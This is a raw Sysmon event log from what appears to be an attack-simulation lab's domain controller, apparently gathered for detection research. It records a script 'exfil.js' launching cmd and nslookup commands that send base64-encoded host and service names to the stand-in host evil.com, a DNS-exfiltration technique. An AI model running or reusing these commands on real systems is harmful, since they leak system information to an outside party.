10341000x8000000000000000203372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.851{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.851{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.851{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-A041-000000005F02}7884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.851{2E1864BB-17A1-629A-783D-000000005F02}55521492C:\Windows\System32\WScript.exe{2E1864BB-17C9-629A-A041-000000005F02}7884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.851{2E1864BB-17C9-629A-A041-000000005F02}7884C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldfkug.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.829{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgxa.tmpMD5=E7F6E6FF66DADCE192851D5CEE89C151,SHA256=52916EC751E038AB876F6BC77E3DDBA879A78F00C8F4A0915C022D7C501FFEAB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000203366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.396{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53003- 354300x8000000000000000203365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.274{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53002- 354300x8000000000000000203364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.274{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53001- 354300x8000000000000000203363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.273{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53000- 354300x8000000000000000203362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.273{00000000-0000-0000-0000-000000000000}7764<unknown process>-udptruefalse127.0.0.1-53000-false127.0.0.1-53domain 354300x8000000000000000203361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.204{00000000-0000-0000-0000-000000000000}7868<unknown process>-udpfalsefalse127.0.0.1-52999-false127.0.0.1-53domain 354300x8000000000000000203360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.204{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52999- 354300x8000000000000000203359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.204{00000000-0000-0000-0000-000000000000}7868<unknown process>-udptruefalse127.0.0.1-52999-false127.0.0.1-53domain 354300x8000000000000000203358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.204{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52998- 354300x8000000000000000203357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.204{00000000-0000-0000-0000-000000000000}7868<unknown process>-udptruefalse127.0.0.1-52998-false127.0.0.1-53domain 22542200x8000000000000000203356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.399{00000000-0000-0000-0000-000000000000}2556evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000203355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.204{00000000-0000-0000-0000-000000000000}7868<unknown process>-udpfalsefalse127.0.0.1-52997-false127.0.0.1-53domain 22542200x8000000000000000203354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.275{00000000-0000-0000-0000-000000000000}7764evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000203353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.203{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52997- 354300x8000000000000000203352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.203{00000000-0000-0000-0000-000000000000}7868<unknown process>-udptruefalse127.0.0.1-52997-false127.0.0.1-53domain 22542200x8000000000000000203351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.206{00000000-0000-0000-0000-000000000000}7868evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000203350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.135{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52996- 354300x8000000000000000203349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.135{00000000-0000-0000-0000-000000000000}1716<unknown process>-udptruefalse127.0.0.1-52996-false127.0.0.1-53domain 22542200x8000000000000000203348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.137{00000000-0000-0000-0000-000000000000}1716evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000203347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.065{00000000-0000-0000-0000-000000000000}6084evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000203346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.134{00000000-0000-0000-0000-000000000000}1716<unknown process>-udpfalsefalse127.0.0.1-52995-false127.0.0.1-53domain 354300x8000000000000000203345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.134{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52995- 354300x8000000000000000203344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.134{00000000-0000-0000-0000-000000000000}1716<unknown process>-udptruefalse127.0.0.1-52995-false127.0.0.1-53domain 22542200x8000000000000000203343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.002{00000000-0000-0000-0000-000000000000}1636evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000203342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.134{00000000-0000-0000-0000-000000000000}1716<unknown process>-udpfalsefalse127.0.0.1-52994-false127.0.0.1-53domain 354300x8000000000000000203341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.134{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52994- 354300x8000000000000000203340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.134{00000000-0000-0000-0000-000000000000}1716<unknown process>-udptruefalse127.0.0.1-52994-false127.0.0.1-53domain 10341000x8000000000000000203339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.798{2E1864BB-17C9-629A-9E41-000000005F02}28244672C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-9F41-000000005F02}2444C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.798{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.798{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.798{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.798{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.782{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-9F41-000000005F02}2444C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.782{2E1864BB-17C9-629A-9D41-000000005F02}64887392C:\Windows\system32\cmd.exe{2E1864BB-17C9-629A-9F41-000000005F02}2444C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.794{2E1864BB-17C9-629A-9F41-000000005F02}2444C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C9-629A-9D41-000000005F02}6488C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgxa.tmp 2>&1 10341000x8000000000000000203331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.767{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-9E41-000000005F02}2824C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.767{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-9E41-000000005F02}2824C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.767{2E1864BB-17C9-629A-9E41-000000005F02}28244672C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-9D41-000000005F02}6488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.751{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-9E41-000000005F02}2824C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.751{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.751{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.751{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.751{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.751{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-9D41-000000005F02}6488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 